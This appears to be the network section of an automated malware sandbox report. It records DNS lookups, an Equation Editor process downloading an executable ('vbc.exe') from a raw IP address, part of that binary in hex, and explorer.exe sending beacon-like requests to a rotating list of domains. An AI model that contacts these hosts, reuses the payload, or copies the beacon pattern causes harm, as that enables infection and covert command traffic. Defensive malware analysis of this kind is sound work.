                                                                                                                                                                        Nov 26, 2020 21:14:15.896807909 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:16.031919003 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:14:21.333838940 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:21.392705917 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:14:26.443860054 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:14:31.935447931 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:31.988279104 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:14:37.356272936 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:37.695303917 CET53524968.8.8.8192.168.2.22
                                                                                                                                                                        Nov 26, 2020 21:14:43.253629923 CET5756453192.168.2.228.8.8.8
                                                                                                                                                                        Nov 26, 2020 21:14:43.302651882 CET53575648.8.8.8192.168.2.22

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                        Nov 26, 2020 21:13:47.852057934 CET192.168.2.228.8.8.80x305Standard query (0)www.nziyade.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:13:54.149552107 CET192.168.2.228.8.8.80x708cStandard query (0)www.coloringprintouts.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:13:59.246659040 CET192.168.2.228.8.8.80xa14dStandard query (0)www.ktproductreviews.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:05.503380060 CET192.168.2.228.8.8.80x2e78Standard query (0)www.mondzorg-postma.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:10.649647951 CET192.168.2.228.8.8.80x2f03Standard query (0)www.cocogreensoil.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:15.896807909 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.moveoneic.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:21.333838940 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.antillean-network.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.443860054 CET192.168.2.228.8.8.80xa84fStandard query (0)www.integratednourishment.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:31.935447931 CET192.168.2.228.8.8.80x4b92Standard query (0)www.gregoryrecommends.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:37.356272936 CET192.168.2.228.8.8.80x4b93Standard query (0)www.yanasacha.comA (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:43.253629923 CET192.168.2.228.8.8.80xc2d7Standard query (0)www.bigdillenergy.comA (IP address)IN (0x0001)

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                        Nov 26, 2020 21:13:48.040323973 CET8.8.8.8192.168.2.220x305No error (0)www.nziyade.comnziyade.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:13:48.040323973 CET8.8.8.8192.168.2.220x305No error (0)nziyade.com92.42.39.29A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:13:54.198481083 CET8.8.8.8192.168.2.220x708cNo error (0)www.coloringprintouts.com52.58.78.16A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:13:59.423624992 CET8.8.8.8192.168.2.220xa14dNo error (0)www.ktproductreviews.comktproductreviews.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:13:59.423624992 CET8.8.8.8192.168.2.220xa14dNo error (0)ktproductreviews.com66.235.200.146A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:05.565918922 CET8.8.8.8192.168.2.220x2e78No error (0)www.mondzorg-postma.com188.93.150.44A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:10.720680952 CET8.8.8.8192.168.2.220x2f03No error (0)www.cocogreensoil.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:10.720680952 CET8.8.8.8192.168.2.220x2f03No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:16.031919003 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.moveoneic.com66.96.162.138A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:21.392705917 CET8.8.8.8192.168.2.220x6ec7No error (0)www.antillean-network.comantillean-network.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:21.392705917 CET8.8.8.8192.168.2.220x6ec7No error (0)antillean-network.com85.10.195.227A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)www.integratednourishment.comparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:26.616909981 CET8.8.8.8192.168.2.220xa84fNo error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:31.988279104 CET8.8.8.8192.168.2.220x4b92No error (0)www.gregoryrecommends.comtarget.clickfunnels.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:31.988279104 CET8.8.8.8192.168.2.220x4b92No error (0)target.clickfunnels.com104.16.16.194A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:31.988279104 CET8.8.8.8192.168.2.220x4b92No error (0)target.clickfunnels.com104.16.15.194A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:31.988279104 CET8.8.8.8192.168.2.220x4b92No error (0)target.clickfunnels.com104.16.12.194A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:31.988279104 CET8.8.8.8192.168.2.220x4b92No error (0)target.clickfunnels.com104.16.14.194A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:31.988279104 CET8.8.8.8192.168.2.220x4b92No error (0)target.clickfunnels.com104.16.13.194A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:37.695303917 CET8.8.8.8192.168.2.220x4b93No error (0)www.yanasacha.com160.124.66.42A (IP address)IN (0x0001)
                                                                                                                                                                        Nov 26, 2020 21:14:43.302651882 CET8.8.8.8192.168.2.220xc2d7No error (0)www.bigdillenergy.com52.58.78.16A (IP address)IN (0x0001)

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • 216.170.126.121
                                                                                                                                                                        • www.nziyade.com
                                                                                                                                                                        • www.coloringprintouts.com
                                                                                                                                                                        • www.ktproductreviews.com
                                                                                                                                                                        • www.mondzorg-postma.com
                                                                                                                                                                        • www.cocogreensoil.com
                                                                                                                                                                        • www.moveoneic.com
                                                                                                                                                                        • www.antillean-network.com
                                                                                                                                                                        • www.integratednourishment.com
                                                                                                                                                                        • www.gregoryrecommends.com
                                                                                                                                                                        • www.yanasacha.com
                                                                                                                                                                        • www.bigdillenergy.com

                                                                                                                                                                        HTTP Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        0192.168.2.2249165216.170.126.12180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:13:00.238950968 CET0OUTGET /hkcmd/vbc.exe HTTP/1.1
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                        Host: 216.170.126.121
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Nov 26, 2020 21:13:00.358699083 CET1INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:13:00 GMT
                                                                                                                                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                        Last-Modified: Thu, 26 Nov 2020 08:44:44 GMT
                                                                                                                                                                        ETag: "74e00-5b4fe8e3ad860"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 478720
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc 6a bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 44 07 00 00 08 00 00 00 00 00 00 8e 62 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 62 07 00 4f 00 00 00 00 80 07 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 42 07 00 00 20 00 00 00 44 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 80 07 00 00 06 00 00 00 46 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 4c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 62 07 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 72 00 00 9c 63 00 00 03 00 00 00 78 00 00 06 4c d6 00 00 f0 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 47 00 00 00 01 00 00 11 02 14 7d 03 00 00 04 02 28 15 00 00 0a 00 00 02 28 06 00 00 06 00 02 73 1d 00 00 06 7d 01 00 00 04 02 7b 01 00 00 04 02 6f 18 00 00 06 00 28 16 00 00 0a 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 6f 1c 00 00 06 00 2a 00 13 30 02 00 c8 00 00 00 02 00 00 11 00 28 17 00 00 0a 02 7b 01 00 00 04 7b 0e 00 00 04 28 18 00 00 0a 0a 12 00 28 19 00 00 0a 7e 10 00 00 04 76 6c fe 02 0b 07 2c 11 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 02 7b 01 00 00 04 7b 0f 00 00 04 04 6f 1b 00 00 0a 6f 1c 00 00 0a 00 02 7b 01 00 00 04 28 17 00 00 0a 7d 0e 00 00 04 04 6f 1b 00 00 0a 1f 0d 33 15 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1d 00 00 0a 16 fe 02 2b 01 16 0c 08 2c 40 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1e 00 00 0a 73 1f 00 00 0a 0d 02 7b 01 00 00 04 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1b 00 00 06 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 00 2a 92 00 02 7b 04 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 00 02 7b 04 00 00 04 7e 11 00 00 04 6f 22 00 00 0a 00 2a 92 00 02 7b 04 00 00 04 28 23 00 00 0a 6f 21 00 00 0a 00 02 7b 04 00 00 04 7e 12 00 00 04 6f 22 00 00 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 03 00 00 11 00 03 2c 0b 02 7b 03 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 03 00 00 04 6f 24 00 00 0a
                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELj_0Db @ @<bO H.textB D `.rsrcF@@.relocL@BpbHrcxL0G}((s}{o({{o*0({{((~vl,{{o{{oo{(}o3{{o+,@{{os{{{o{{o*{( o!{~o"*{(#o!{~o"*0+,{+,{o$


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        1192.168.2.224916692.42.39.2980C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:13:48.109751940 CET507OUTGET /sqe3/?cB=b5w1+wtMG086+ku5rySlnuvQ6Xf8quQxjwBGS8AB8cD8tokaT2Rnkch2TwRAgrEjQEkeCg==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.nziyade.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:13:49.526554108 CET509INHTTP/1.1 404 Not Found
                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                                                                        Link: <https://www.nziyade.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                        X-Powered-By-Plesk: PleskWin
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:13:34 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Length: 55925
                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0d 0a 0d 0a 09 09 09 09 0d 0a 09 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 30 5c 2f 73 76 67
                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><title>Sayfa bulunamad &#8211; Ziyade Pide &amp; Kebap</title><link rel='dns-prefetch' href='//s.w.org' /><link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="Ziyade Pide &amp; Kebap &raquo; beslemesi" href="https://www.nziyade.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Ziyade Pide &amp; Kebap &raquo; yorum beslemesi" href="https://www.nziyade.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        10192.168.2.2249175160.124.66.4280C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:37.975326061 CET618OUTGET /sqe3/?cB=doZAOm1JLTF4Hw2qDVobBoiqnusmrIjoueOoEC46DGrv2J4+txpFe/3Q5GbV3HQ5vdwqSA==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.yanasacha.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:38.257570982 CET618INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:13:41 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 1.0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        11192.168.2.224917652.58.78.1680C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:43.320058107 CET619OUTGET /sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.bigdillenergy.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:14:43.336735964 CET620INHTTP/1.1 410 Gone
                                                                                                                                                                        Server: openresty/1.13.6.2
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:14:02 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 31 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 67 64 69 6c 6c 65 6e 65 72 67 79 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 64 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 67 64 69 6c 6c 65 6e 65 72 67 79 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 7<html>9 <head>51 <meta http-equiv='refresh' content='5; url=http://www.bigdillenergy.com/' />a </head>9 <body>3d You are being redirected to http://www.bigdillenergy.coma </body>8</html>0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        2192.168.2.224916752.58.78.1680C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:13:54.217690945 CET514OUTGET /sqe3/?cB=+ZQWL9nqnp3EOm8ikLy2BwgKdV18m5qkp85bGkYyvqO5Knmmx3CsQ0WtNG04x/T/vHfJsQ==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.coloringprintouts.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 26, 2020 21:13:54.234344006 CET514INHTTP/1.1 410 Gone
                                                                                                                                                                        Server: openresty/1.13.6.2
                                                                                                                                                                        Date: Thu, 26 Nov 2020 20:13:13 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 35 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 69 6e 67 70 72 69 6e 74 6f 75 74 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 31 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 69 6e 67 70 72 69 6e 74 6f 75 74 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 7<html>9 <head>55 <meta http-equiv='refresh' content='5; url=http://www.coloringprintouts.com/' />a </head>9 <body>41 You are being redirected to http://www.coloringprintouts.coma </body>8</html>0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        3192.168.2.224916866.235.200.14680C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:13:59.443011999 CET515OUTGET /sqe3/?cB=DRVVqDahppZVcoMwHtqBO8gGbVXxnEQtD1Fk26hq+CZg2PM8h76HHU2382Ywn2xY/MQpAg==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.ktproductreviews.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        4192.168.2.2249169188.93.150.4480C:\Windows\explorer.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Nov 26, 2020 21:14:05.591139078 CET516OUTGET /sqe3/?cB=nOVFEnbxdO1KUFG+sKoXHHXF5stR7dv4oa+WZ4s9syusWu0cHacPS3mYPEahtKUV1nLuVQ==&NreT=XJE0G4nHflj HTTP/1.1
                                                                                                                                                                        Host: www.mondzorg-postma.com
                                                                                                                                                                        Connection: close
